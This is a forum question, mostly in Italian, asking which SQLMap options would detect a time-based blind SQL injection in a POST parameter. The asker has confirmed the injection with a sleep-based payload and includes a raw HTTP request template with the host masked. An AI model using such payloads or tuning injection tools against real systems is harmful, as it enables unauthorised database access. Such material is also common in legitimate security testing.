Ho una vulnerabilità cieca di SQL injection verificata ma SQLMap non può riconoscerla. L'ho verificato inserendo i seguenti parametri per il parametro "s" POST:
s=OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"
Causes 5 second server response delay
anche questo funziona anche:
s=OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"
Causes 10 second server response delay
Ho provato una combinazione di opzioni per SQLMap per rilevarlo ma continua a non riuscire a trovarlo. Qualcuno può dirmi quali parametri posso utilizzare per consentire a SQLMap di rilevare questa vulnerabilità?
Per vostra informazione, utilizzo i parametri -r e -p poiché si tratta di una vulnerabilità dei post. Questo è come appare il mio file -r:
POST /* HTTP/1.1
Host: *
Origin: http://*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://*/*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cache-Control: no-cache
s=